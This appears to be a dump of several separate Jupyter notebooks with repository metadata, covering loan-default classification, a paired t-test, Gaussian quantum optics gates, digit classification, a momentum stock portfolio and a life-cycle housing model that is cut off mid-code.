Machine Learning/Models/Comparing-the-results-of-Decision-Trees-and-Random-Forests-on-LendingClub-dataset.ipynb
KhushMody/Ds-Algo-HacktoberFest
2cb5bdcfcdcb87b67ee31941cc9afc466507a05b
[ "MIT" ]
55
2020-10-04T03:09:25.000Z
2021-10-16T09:00:12.000Z
176.725764
96,956
0.880668
[ [ [ "# Random Forest Project \n\nFor this project we will be exploring publicly available data from [LendingClub.com](www.lendingclub.com). Lending Club connects people who need money (borrowers) with people who have money (investors). Hopefully, as an investor you would want to invest in people who showed a profile of having a high probability of paying you back. We will try to create a model that will help predict this.\n\nLending club had a [very interesting year in 2016](https://en.wikipedia.org/wiki/Lending_Club#2016), so let's check out some of their data and keep the context in mind. This data is from before they even went public.\n\nWe will use lending data from 2007-2010 and be trying to classify and predict whether or not the borrower paid back their loan in full.\n\nHere are what the columns represent:\n* credit.policy: 1 if the customer meets the credit underwriting criteria of LendingClub.com, and 0 otherwise.\n* purpose: The purpose of the loan (takes values \"credit_card\", \"debt_consolidation\", \"educational\", \"major_purchase\", \"small_business\", and \"all_other\").\n* int.rate: The interest rate of the loan, as a proportion (a rate of 11% would be stored as 0.11). Borrowers judged by LendingClub.com to be more risky are assigned higher interest rates.\n* installment: The monthly installments owed by the borrower if the loan is funded.\n* log.annual.inc: The natural log of the self-reported annual income of the borrower.\n* dti: The debt-to-income ratio of the borrower (amount of debt divided by annual income).\n* fico: The FICO credit score of the borrower.\n* days.with.cr.line: The number of days the borrower has had a credit line.\n* revol.bal: The borrower's revolving balance (amount unpaid at the end of the credit card billing cycle).\n* revol.util: The borrower's revolving line utilization rate (the amount of the credit line used relative to total credit available).\n* inq.last.6mths: The borrower's number of inquiries by creditors in the last 6 months.\n* delinq.2yrs: The number of times the borrower had been 30+ days past due on a payment in the past 2 years.\n* pub.rec: The borrower's number of derogatory public records (bankruptcy filings, tax liens, or judgments).", "_____no_output_____" ], [ "# Import Libraries\n\n**Import the usual libraries for pandas and plotting.", "_____no_output_____" ] ], [ [ "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n%matplotlib inline", "_____no_output_____" ] ], [ [ "## Get the Data\n\n** Use pandas to read loan_data.csv as a dataframe called loans.**", "_____no_output_____" ] ], [ [ "loans = pd.read_csv('loan_data.csv')", "_____no_output_____" ] ], [ [ "** Check out the info(), head(), and describe() methods on loans.**", "_____no_output_____" ] ], [ [ "loans.info()", "<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 9578 entries, 0 to 9577\nData columns (total 14 columns):\ncredit.policy 9578 non-null int64\npurpose 9578 non-null object\nint.rate 9578 non-null float64\ninstallment 9578 non-null float64\nlog.annual.inc 9578 non-null float64\ndti 9578 non-null float64\nfico 9578 non-null int64\ndays.with.cr.line 9578 non-null float64\nrevol.bal 9578 non-null int64\nrevol.util 9578 non-null float64\ninq.last.6mths 9578 non-null int64\ndelinq.2yrs 9578 non-null int64\npub.rec 9578 non-null int64\nnot.fully.paid 9578 non-null int64\ndtypes: float64(6), int64(7), object(1)\nmemory usage: 1.0+ MB\n" ], [ "loans.describe()", "_____no_output_____" ], [ "loans.head()", 
"_____no_output_____" ] ], [ [ "# Exploratory Data Analysis\n\n** Create a histogram of two FICO distributions on top of each other, one for each credit.policy outcome.**", "_____no_output_____" ] ], [ [ "plt.figure(figsize=(10,6))\nloans[loans['credit.policy']==1]['fico'].hist(alpha=0.5,bins=30,color='blue',label='Credit.Policy=1')\nloans[loans['credit.policy']==0]['fico'].hist(alpha=0.5,bins=30,color='red',label='Credit.Policy=0')\nplt.legend()\nplt.xlabel('FICO')", "_____no_output_____" ] ], [ [ "** Create a similar figure, except this time select by the not.fully.paid column.**", "_____no_output_____" ] ], [ [ "plt.figure(figsize=(10,6))\nloans[loans['not.fully.paid']==1]['fico'].hist(alpha=0.5,bins=30,color='blue',label='Credit.Policy=1')\nloans[loans['not.fully.paid']==0]['fico'].hist(alpha=0.5,bins=30,color='red',label='Credit.Policy=0')\nplt.legend()\nplt.xlabel('FICO')", "_____no_output_____" ] ], [ [ "** Create a countplot using seaborn showing the counts of loans by purpose, with the color hue defined by not.fully.paid. **", "_____no_output_____" ] ], [ [ "sns.countplot(x='purpose',data=loans,hue='not.fully.paid')", "_____no_output_____" ] ], [ [ "** Let's see the trend between FICO score and interest rate.**", "_____no_output_____" ] ], [ [ "sns.jointplot(x='fico',y='int.rate',data=loans,color='purple')", "_____no_output_____" ] ], [ [ "** Create the following lmplots to see if the trend differed between not.fully.paid and credit.policy.**", "_____no_output_____" ] ], [ [ "sns.lmplot(x='fico',y='int.rate',data=loans,hue='credit.policy',col='not.fully.paid')", "_____no_output_____" ] ], [ [ "# Setting up the Data\n\nLet's get ready to set up our data for our Random Forest Classification Model!\n\n**Check loans.info() again.**", "_____no_output_____" ] ], [ [ "loans.info()", "<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 9578 entries, 0 to 9577\nData columns (total 14 columns):\ncredit.policy 9578 non-null int64\npurpose 9578 non-null object\nint.rate 9578 non-null float64\ninstallment 9578 non-null float64\nlog.annual.inc 9578 non-null float64\ndti 9578 non-null float64\nfico 9578 non-null int64\ndays.with.cr.line 9578 non-null float64\nrevol.bal 9578 non-null int64\nrevol.util 9578 non-null float64\ninq.last.6mths 9578 non-null int64\ndelinq.2yrs 9578 non-null int64\npub.rec 9578 non-null int64\nnot.fully.paid 9578 non-null int64\ndtypes: float64(6), int64(7), object(1)\nmemory usage: 1.0+ MB\n" ] ], [ [ "## Categorical Features\n\nNotice that the **purpose** column as categorical\n\n**Create a list of 1 element containing the string 'purpose'. Call this list cat_feats.**", "_____no_output_____" ] ], [ [ "cat_feat = ['purpose']", "_____no_output_____" ] ], [ [ "**Now use pd.get_dummies(loans,columns=cat_feats,drop_first=True) to create a fixed larger dataframe that has new feature columns with dummy variables. 
Set this dataframe as final_data.**", "_____no_output_____" ] ], [ [ "final_data = pd.get_dummies(loans,columns=cat_feat,drop_first=True)", "_____no_output_____" ], [ "final_data.info()", "<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 9578 entries, 0 to 9577\nData columns (total 19 columns):\ncredit.policy 9578 non-null int64\nint.rate 9578 non-null float64\ninstallment 9578 non-null float64\nlog.annual.inc 9578 non-null float64\ndti 9578 non-null float64\nfico 9578 non-null int64\ndays.with.cr.line 9578 non-null float64\nrevol.bal 9578 non-null int64\nrevol.util 9578 non-null float64\ninq.last.6mths 9578 non-null int64\ndelinq.2yrs 9578 non-null int64\npub.rec 9578 non-null int64\nnot.fully.paid 9578 non-null int64\npurpose_credit_card 9578 non-null uint8\npurpose_debt_consolidation 9578 non-null uint8\npurpose_educational 9578 non-null uint8\npurpose_home_improvement 9578 non-null uint8\npurpose_major_purchase 9578 non-null uint8\npurpose_small_business 9578 non-null uint8\ndtypes: float64(6), int64(7), uint8(6)\nmemory usage: 1.0 MB\n" ] ], [ [ "## Train Test Split\n\nNow its time to split our data into a training set and a testing set!", "_____no_output_____" ] ], [ [ "from sklearn.model_selection import train_test_split", "_____no_output_____" ], [ "X = final_data.drop('not.fully.paid',axis=1)\ny = final_data['not.fully.paid']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)", "_____no_output_____" ] ], [ [ "## Training a Decision Tree Model\n\nLet's start by training a single decision tree first!\n\n** Import DecisionTreeClassifier**", "_____no_output_____" ] ], [ [ "from sklearn.tree import DecisionTreeClassifier", "_____no_output_____" ] ], [ [ "**Create an instance of DecisionTreeClassifier() called dtree and fit it to the training data.**", "_____no_output_____" ] ], [ [ "dtree = DecisionTreeClassifier()", "_____no_output_____" ], [ "dtree.fit(X_train,y_train)", "_____no_output_____" ] ], [ [ "## Predictions and Evaluation of Decision Tree\n**Create predictions from the test set and create a classification report and a confusion matrix.**", "_____no_output_____" ] ], [ [ "pred = dtree.predict(X_test)", "_____no_output_____" ], [ "from sklearn.metrics import classification_report,confusion_matrix", "_____no_output_____" ], [ "print(classification_report(y_test,pred))", " precision recall f1-score support\n\n 0 0.85 0.83 0.84 2405\n 1 0.21 0.22 0.21 469\n\n accuracy 0.73 2874\n macro avg 0.53 0.53 0.53 2874\nweighted avg 0.74 0.73 0.74 2874\n\n" ], [ "print(confusion_matrix(y_test,pred))", "[[2000 405]\n [ 364 105]]\n" ] ], [ [ "## Training the Random Forest model\n\n**Create an instance of the RandomForestClassifier class and fit it to our training data from the previous step.**", "_____no_output_____" ] ], [ [ "from sklearn.ensemble import RandomForestClassifier", "_____no_output_____" ], [ "rfc = RandomForestClassifier(n_estimators=600)", "_____no_output_____" ], [ "rfc.fit(X_train,y_train)", "_____no_output_____" ] ], [ [ "## Predictions and Evaluation", "_____no_output_____" ] ], [ [ "pred = rfc.predict(X_test)", "_____no_output_____" ] ], [ [ "**Now create a classification report from the results.**", "_____no_output_____" ] ], [ [ "print(classification_report(y_test,pred))", " precision recall f1-score support\n\n 0 0.84 1.00 0.91 2405\n 1 0.75 0.01 0.03 469\n\n accuracy 0.84 2874\n macro avg 0.79 0.51 0.47 2874\nweighted avg 0.82 0.84 0.77 2874\n\n" ] ], [ [ "**Show the Confusion Matrix for the predictions.**", "_____no_output_____" ] ], [ [ 
"print(confusion_matrix(y_test,pred))", "[[2403 2]\n [ 463 6]]\n" ] ], [ [ "**What performed better the random forest or the decision tree?**", "_____no_output_____" ] ], [ [ "# RandomForestClassifier showed better results but the results are still not good enough, so future engineering is needed", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
cb1cb6fdc3b20c3d527c296fae9210c695484b6f
61,987
ipynb
Jupyter Notebook
book/_build/jupyter_execute/inferential/demo02_PairedDifferenceT-Test.ipynb
hossainlab/statswithpy
981ecfe4937f18e4c8a8420f7c362cb187d6cbeb
[ "MIT" ]
null
null
null
book/_build/jupyter_execute/inferential/demo02_PairedDifferenceT-Test.ipynb
hossainlab/statswithpy
981ecfe4937f18e4c8a8420f7c362cb187d6cbeb
[ "MIT" ]
null
null
null
book/_build/jupyter_execute/inferential/demo02_PairedDifferenceT-Test.ipynb
hossainlab/statswithpy
981ecfe4937f18e4c8a8420f7c362cb187d6cbeb
[ "MIT" ]
null
null
null
86.453278
27,408
0.801475
[ [ [ "import pandas as pd\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nfrom sklearn.preprocessing import scale\n\nfrom scipy import stats\nimport researchpy as rp", "_____no_output_____" ] ], [ [ "https://github.com/Opensourcefordatascience/Data-sets/blob/master/blood_pressure.csv\n\nIn this dataset fictitious and contains blood pressure readings before and after an intervention. These are variables “bp_before” and “bp_after”.", "_____no_output_____" ] ], [ [ "bp_reading = pd.read_csv('datasets/blood_pressure.csv')", "_____no_output_____" ], [ "bp_reading.sample(10)", "_____no_output_____" ], [ "bp_reading.shape", "_____no_output_____" ], [ "bp_reading.describe().T", "_____no_output_____" ], [ "bp_reading[['bp_before', 'bp_after']].boxplot(figsize=(12, 8))", "_____no_output_____" ] ], [ [ "## The hypothesis being tested", "_____no_output_____" ], [ "* __Null hypothesis (H0): u1 = u2, which translates to the mean of sample 01 is equal to the mean of sample 02__\n* __Alternative hypothesis (H1): u1 ? u2, which translates to the means of sample 01 is not equal to sample 02__ ", "_____no_output_____" ], [ "## Assumption check \n\n* The samples are independently and randomly drawn\n* The distribution of the residuals between the two groups should follow the normal distribution\n* The variances between the two groups are equal", "_____no_output_____" ] ], [ [ "stats.levene(bp_reading['bp_after'], bp_reading['bp_before'])", "_____no_output_____" ], [ "bp_reading['bp_diff'] = scale(bp_reading['bp_after'] - bp_reading['bp_before'])", "/anaconda3/lib/python3.7/site-packages/sklearn/utils/validation.py:595: DataConversionWarning: Data with input dtype int64 was converted to float64 by the scale function.\n warnings.warn(msg, DataConversionWarning)\n" ], [ "bp_reading[['bp_diff']].head()", "_____no_output_____" ], [ "bp_reading[['bp_diff']].hist(figsize=(12, 8))", "_____no_output_____" ] ], [ [ "### Checking Normal distribution by Q-Q plot graph\nhttps://www.statisticshowto.datasciencecentral.com/assumption-of-normality-test/", "_____no_output_____" ] ], [ [ "plt.figure(figsize=(15, 8))\nstats.probplot(bp_reading['bp_diff'], plot=plt)\n\nplt.title('Blood pressure difference Q-Q plot')\nplt.show()", "_____no_output_____" ] ], [ [ "**Note:-** The corresponding points are lies very close to line that means are our sample data sets are normally distributed", "_____no_output_____" ], [ "### Checking Normal distribution by method of `Shapiro stats`\nhttps://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.shapiro.html", "_____no_output_____" ] ], [ [ "stats.shapiro(bp_reading['bp_diff'])", "_____no_output_____" ], [ "stats.ttest_rel(bp_reading['bp_after'], bp_reading['bp_before'])", "_____no_output_____" ] ], [ [ "**Note:-** __Here, `t-test = -3.337` and `p-value = 0.0011` since p-value is less than the significant value hence null-hypothesis is rejected`(Alpha = 0.05)`__", "_____no_output_____" ], [ "### T-test using `researchpy`\nhttps://researchpy.readthedocs.io/en/latest/ttest_documentation.html", "_____no_output_____" ] ], [ [ "rp.ttest(bp_reading['bp_after'], bp_reading['bp_before'], \n paired = True, equal_variances=False)", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ] ]
cb1cb80e9cc6fc0295a3482e7d53562859617477
11,080
ipynb
Jupyter Notebook
examples/GaussianGates.ipynb
ryosukehata/Photonqat
d5e320d3cc9ed94f6d63b1721f6871f13a0e6ea7
[ "Apache-2.0" ]
null
null
null
examples/GaussianGates.ipynb
ryosukehata/Photonqat
d5e320d3cc9ed94f6d63b1721f6871f13a0e6ea7
[ "Apache-2.0" ]
null
null
null
examples/GaussianGates.ipynb
ryosukehata/Photonqat
d5e320d3cc9ed94f6d63b1721f6871f13a0e6ea7
[ "Apache-2.0" ]
null
null
null
49.686099
5,228
0.71065
[ [ [ "import photonqat as pq", "_____no_output_____" ], [ "import numpy as np\nimport matplotlib.pyplot as plt", "_____no_output_____" ] ], [ [ "## Photonqat\n\n基本的なゲート動作と測定を一通り行っています。", "_____no_output_____" ] ], [ [ "G = pq.Gaussian(2) # two qumode [0, 1]\nG.D(0, 2) # Displacement gate, x to x+2\nG.S(0, 1) # X squeeIng gate, r=1\nG.R(0, np.pi/4) # pi/4 rotation gate\nG.BS(0, 1, np.pi/4) # 50:50 beam splitter\nx = G.MeasX(1) # Measure mode 1\nG.Wigner(0) # plot\nprint('measured x =', x)\nprint('mu0 =', G.mean(0)) # mu of qumode 0\nprint('cov0 =', G.cov(0)) # covarince of qumode 1", "_____no_output_____" ] ], [ [ "## 以下、メモ", "_____no_output_____" ], [ "## Phase space について\n\nN bosonic mode Hilbert space \n$\\otimes^{N}_{k=1} \\mathcal{H}_k$\n\nvectorial operator \n$\\hat{\\mathbf{b}} = (\\hat{a}_1, \\hat{a}_1^{\\dagger}, \\dots, \\hat{a}_N, \\hat{a}_N^{\\dagger})$ : 2N elements\n\nbosonic commutation relations \n$[\\hat{b}_i, \\hat{b}_j] = \\Omega_{ij}\\ \\ (i, j = 1, \\dots, 2N)$ \n\n$\\mathbf{\\Omega} = \\oplus_{k=1}^{N}\\omega\\ \\ \\ \n\\omega = \n\\begin{pmatrix}\n0 & 1 \\\\\n-1 & 0 \\\\\n\\end{pmatrix}\n$\n\nQuadrature field \n$\\hat{\\mathbf{x}} = (\\hat{q}_1, \\hat{p}_1, \\dots, \\hat{q}_N, \\hat{p}_N)$ : 2N elements\n\ncanonical commutation relation \n$[\\hat{x}_i, \\hat{x}_j] = 2i\\Omega_{ij}\\ \\ (i, j = 1, \\dots, 2N)$ ", "_____no_output_____" ], [ "## 密度演算子とWigner関数\n\n任意の密度演算子$\\hat{\\rho}$を考える \n\n任意の密度演算子は等価なWigner関数が存在する\n\nWeyl operator \n$D(\\xi) = \\exp(i \\hat{x}^T \\Omega \\hat{\\xi})$ \n\nこれを用いて、Wigner characteristic functionを定義できる \n$\\chi (\\xi) = \\mathrm{Tr}[\\hat{\\rho}D(\\xi)]$\n\nWigner characteristic functionのフーリエ変換がWigner function \n$W(\\mathbf{x}) = \\int_{R^{2N}} \\frac{d^{2N}}{(2\\pi)^{2N}} \\exp{(-i \\hat{x}^T \\Omega \\hat{\\xi})} \\chi (\\xi)$", "_____no_output_____" ], [ "## 統計量とWigner関数\n\nWigner functionは統計量でも定義できる \n\n- first moment \n$\\bar{\\mathbf{x}} = \\langle \\hat{\\mathbf{x}} \\rangle= \\mathrm{Tr}[\\hat{\\mathbf{x}} \\hat{\\rho}]$\n\n- second moment \n$V_{ij} = \\frac{1}{2}\\langle \\{\\Delta\\hat{x}_i, \\Delta\\hat{x}_j \\}\\rangle$ \n$\\{ A, B \\} = AB+BA$\n\n$V_{ii}$は$\\hat{x}_i$の分散をあらわす\n\nGaussian stateは最初の2モーメントだけで完全に記述可能", "_____no_output_____" ], [ "## Gaussian Unitaryについて\n\nQuadrature operatorにおいては、Gaussian UnitaryはAffien写像で書ける! \n$(\\mathbf{S}, \\mathbf{d}) : \\hat{\\mathrm{x}}\\to \\mathbf{S}\\mathrm{x} + \\mathbf{d}$\n\nWilliamson's Theorem \n任意の偶数次元の正定値実行列はsimplectic transformで対角化できる \n$\\mathbf{V} = \\mathbf{SV}^{\\oplus}\\mathbf{S}^{T}$ \n$\\mathbf{V}^{\\oplus} = \\oplus^{N}_{k=1} \\nu_k \\mathbf{I}$", "_____no_output_____" ], [ "## Gaussian Measurement \n\nPOVM: $\\Pi_i = E_{i}^{\\dagger}E_i\\ \\ \\ (\\sum_i E_{i}^{\\dagger}E_i = I)$ \nこれを連続量に置き換える \n\nGaussian Measurementとは、Gaussian stateに対して行い、出力結果がGaussian Distributionで、測定しなかったモードはGaussian stateのままである\n\n測定するsubsystemを$\\mathbf{B}$として、それ以外のsubsystemを$\\mathbf{A}$とする。\n\n測定結果の確率分布:測定モード以外の直交位相を周辺化したGaussian Wigner分布 \n測定後の状態:以下のようになる.\n\n\n$\\mathbf{V} = \\mathbf{A} - \\mathbf{C}(\\mathbf{\\Pi B \\Pi})^{-1}\\mathbf{C}^T$ \n$\\mathbf{\\Pi} = \\rm{diag}(1, 0)$ ($\\hat{x}$測定の場合)\n\n$\\mathbf{\\Pi B \\Pi}$は非正則。pseudo-inverseを用いる。 \n$(\\mathbf{\\Pi B \\Pi})^{-1} = B_{11}^{-1}\\Pi$\n\nこれは多変量ガウス分布の条件付き分布をとるのと基本的に同じ \nなので同様に測定後の状態の平均もとれる\n\n$\\mathbf{\\mu} = \\mathbf{\\mu_A} - \\mathbf{C}(\\mathbf{\\Pi B \\Pi})^{-1}(\\mathbf{\\mu_B} - x_B\\mathbf{\\Pi})$", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown" ]
[ [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
cb1cbcbe071d7569479bf02a128fef6f4412ffae
3,225
ipynb
Jupyter Notebook
analysis/notebooks/Labs/momentum_portfolio.ipynb
ksilo/LiuAlgoTrader
90b3ffdf4fd61adf37880e7b01ca4137a013f79c
[ "MIT" ]
null
null
null
analysis/notebooks/Labs/momentum_portfolio.ipynb
ksilo/LiuAlgoTrader
90b3ffdf4fd61adf37880e7b01ca4137a013f79c
[ "MIT" ]
null
null
null
analysis/notebooks/Labs/momentum_portfolio.ipynb
ksilo/LiuAlgoTrader
90b3ffdf4fd61adf37880e7b01ca4137a013f79c
[ "MIT" ]
null
null
null
20.806452
75
0.51814
[ [ [ "# Momentum Portfolio Analysis", "_____no_output_____" ] ], [ [ "portfolio_id = \"233d16d0-3d07-4153-a4c4-b9cee6b3aef9\"", "_____no_output_____" ] ], [ [ "### imports", "_____no_output_____" ] ], [ [ "import alpaca_trade_api as tradeapi\nfrom liualgotrader.analytics import portfolio\nfrom liualgotrader.common.market_data import index_data", "_____no_output_____" ] ], [ [ "### Load SP500 data", "_____no_output_____" ] ], [ [ "sp500 = await index_data(\"SP500\")", "_____no_output_____" ] ], [ [ "### Load recommanded portfolio details", "_____no_output_____" ] ], [ [ "data_api = tradeapi.REST(base_url=\"https://api.alpaca.markets\")", "_____no_output_____" ], [ "df = await portfolio.load(data_api, portfolio_id)\nfor i, row in df.iterrows():\n df.loc[df.symbol == row.symbol, \"Security\"] = sp500.loc[\n sp500.Symbol == row.symbol, \"Security\"\n ].values[0]\n df.loc[df.symbol == row.symbol, \"Sector\"] = sp500.loc[\n sp500.Symbol == row.symbol, \"GICS Sector\"\n ].values[0]\n df.loc[df.symbol == row.symbol, \"Industry\"] = sp500.loc[\n sp500.Symbol == row.symbol, \"GICS Sub-Industry\"\n ].values[0]", "_____no_output_____" ] ], [ [ "## Suggest Momentum Portfolio", "_____no_output_____" ] ], [ [ "portfolio_size = 5000", "_____no_output_____" ], [ "for i, row in df.iterrows():\n df.loc[df.symbol==row.symbol,\"subtotal\"] = df.price * df.qty\ndf['accumulatvie'] = df.subtotal.cumsum()", "_____no_output_____" ], [ "display(df)\nprint(f\"total to invest: {df.subtotal.sum()}\")", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ] ]
cb1cc4e6db39db3159db38c56292538eef46914c
9,586
ipynb
Jupyter Notebook
CE019_Lab3/019_Lab3_Task2_Digits_Processing.ipynb
neel4888/019_Neel
2d4458d796ed64a592fc32aef23750608b20c4f8
[ "Apache-2.0" ]
null
null
null
CE019_Lab3/019_Lab3_Task2_Digits_Processing.ipynb
neel4888/019_Neel
2d4458d796ed64a592fc32aef23750608b20c4f8
[ "Apache-2.0" ]
null
null
null
CE019_Lab3/019_Lab3_Task2_Digits_Processing.ipynb
neel4888/019_Neel
2d4458d796ed64a592fc32aef23750608b20c4f8
[ "Apache-2.0" ]
null
null
null
9,586
9,586
0.79324
[ [ [ "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom sklearn import datasets\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, confusion_matrix, precision_score, recall_score", "_____no_output_____" ], [ "ds_digit = datasets.load_digits()\nprint(\"No. of examples and features in the dataset are:\", ds_digit.data.shape)\nds = pd.DataFrame(ds_digit.data)\n#ds.head()", "No. of examples and features in the dataset are: (1797, 64)\n" ], [ "#ds.info()\n#ds.describe()", "_____no_output_____" ] ], [ [ "Printing the names of features and label types of digits", "_____no_output_____" ] ], [ [ "print(\"Features are as follows:\\n\", ds_digit.data)\nprint(\"\\nLabels:\\n\", np.unique(ds_digit.target))", "13 Featuresare as follows:\n [[ 0. 0. 5. ... 0. 0. 0.]\n [ 0. 0. 0. ... 10. 0. 0.]\n [ 0. 0. 0. ... 16. 9. 0.]\n ...\n [ 0. 0. 1. ... 6. 0. 0.]\n [ 0. 0. 2. ... 12. 0. 0.]\n [ 0. 0. 10. ... 12. 1. 0.]]\n\nLabels:\n [0 1 2 3 4 5 6 7 8 9]\n" ], [ "training_data, testing_data, training_target, testing_target = train_test_split(ds_digit.data, ds_digit.target, test_size = 0.20, random_state = 19)", "_____no_output_____" ] ], [ [ "Creating an instance of classifier and fitting the model.", "_____no_output_____" ] ], [ [ "mnb=MultinomialNB()\nmnb.fit(training_data,training_target)", "_____no_output_____" ] ], [ [ "Testing the model and getting accuracy score, confusion matrix, precision score and recall score", "_____no_output_____" ] ], [ [ "# Testing\nprediction_target = mnb.predict(testing_data)\n\n# Getting Accuracy\naccuracy = accuracy_score(testing_target, prediction_target)\nprint(\"Accuracy Score:\\n\", accuracy)\n\n# Getting Confusion Matrix\ncm = confusion_matrix(testing_target, prediction_target)\nprint(\"\\nConfusion Matrix:\\n\",cm)\n\n# Getting Precision\nprecision = precision_score(testing_target, prediction_target, average=None)\nprint(\"\\nPrecision Score:\\n\", precision)\n\n# Getting Recall\nrecall = recall_score(testing_target, prediction_target, average=None)\nprint(\"\\nRecall Score:\\n\", recall)", "Accuracy Score:\n 0.8888888888888888\n\nConfusion Matrix:\n [[42 0 0 0 1 0 0 0 0 0]\n [ 0 28 5 0 0 0 0 0 6 3]\n [ 0 3 33 0 0 0 0 0 4 0]\n [ 0 0 0 31 0 0 0 0 3 0]\n [ 0 0 0 0 36 0 0 1 0 0]\n [ 0 0 0 0 0 26 0 0 0 2]\n [ 0 2 0 0 0 0 26 0 0 0]\n [ 0 0 0 0 2 0 0 31 0 0]\n [ 0 2 0 0 1 0 0 1 38 1]\n [ 0 0 0 0 0 1 0 2 0 29]]\n\nPrecision Score:\n [1. 0.8 0.86842105 1. 0.9 0.96296296\n 1. 0.88571429 0.74509804 0.82857143]\n\nRecall Score:\n [0.97674419 0.66666667 0.825 0.91176471 0.97297297 0.92857143\n 0.92857143 0.93939394 0.88372093 0.90625 ]\n" ], [ "plt.gray() \nplt.matshow(ds_digit.images[100]) ", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ] ]
cb1cc81d2feb5ae4a88ba0c6fea1ab29b47b39e6
14,662
ipynb
Jupyter Notebook
20201106/simpleHousing.ipynb
dongxulee/lifeCycle
2b4a74dbd64357d00b29f7d946a66afcba747cc6
[ "MIT" ]
null
null
null
20201106/simpleHousing.ipynb
dongxulee/lifeCycle
2b4a74dbd64357d00b29f7d946a66afcba747cc6
[ "MIT" ]
null
null
null
20201106/simpleHousing.ipynb
dongxulee/lifeCycle
2b4a74dbd64357d00b29f7d946a66afcba747cc6
[ "MIT" ]
null
null
null
38.182292
157
0.422248
[ [ [ "### Simple housing version", "_____no_output_____" ], [ "* State: $[w, n, M, e, \\hat{S}, z]$, where $z$ is the stock trading experience, which took value of 0 and 1. And $\\hat{S}$ now contains 27 states.\n* Action: $[c, b, k, q]$ where $q$ only takes 2 value: $1$ or $\\frac{1}{2}$", "_____no_output_____" ] ], [ [ "from scipy.interpolate import interpn\nfrom multiprocessing import Pool\nfrom functools import partial\nfrom constant import *\nimport warnings\nwarnings.filterwarnings(\"ignore\")", "_____no_output_____" ], [ "#Define the utility function\ndef u(c):\n return (np.float_power(c, 1-gamma) - 1)/(1 - gamma)\n\n#Define the bequeath function, which is a function of wealth\ndef uB(tb):\n return B*u(tb)\n\n#Calcualte HE \ndef calHE(x):\n # the input x is a numpy array \n # w, n, M, e, s, z = x\n HE = H*pt - x[:,2]\n return HE\n\n#Calculate TB \ndef calTB(x):\n # the input x as a numpy array\n # w, n, M, e, s, z = x\n TB = x[:,0] + x[:,1] + calHE(x)\n return TB\n\n#The reward function \ndef R(x, a):\n '''\n Input:\n state x: w, n, M, e, s, z\n action a: c, b, k, q = a which is a np array\n Output: \n reward value: the length of return should be equal to the length of a\n '''\n w, n, M, e, s, z = x\n reward = np.zeros(a.shape[0])\n # actions with not renting out \n nrent_index = (a[:,3]==1)\n # actions with renting out \n rent_index = (a[:,3]!=1)\n # housing consumption not renting out \n nrent_Vh = (1+kappa)*H\n # housing consumption renting out \n rent_Vh = (1-kappa)*(H/2)\n # combined consumption with housing consumption \n nrent_C = np.float_power(a[nrent_index][:,0], alpha) * np.float_power(nrent_Vh, 1-alpha)\n rent_C = np.float_power(a[rent_index][:,0], alpha) * np.float_power(rent_Vh, 1-alpha)\n reward[nrent_index] = u(nrent_C)\n reward[rent_index] = u(rent_C)\n return reward", "_____no_output_____" ], [ "def transition(x, a, t):\n '''\n Input: state and action and time, where action is an array\n Output: possible future states and corresponding probability \n '''\n w, n, M, e, s, z = x\n s = int(s)\n e = int(e)\n nX = len(x)\n aSize = len(a)\n # mortgage payment\n m = M/D[T_max-t]\n M_next = M*(1+rh) - m\n # actions\n b = a[:,1]\n k = a[:,2]\n q = a[:,3]\n # transition of z\n z_next = np.ones(aSize)\n if z == 0:\n z_next[k==0] = 0\n # we want the output format to be array of all possible future states and corresponding\n # probability. 
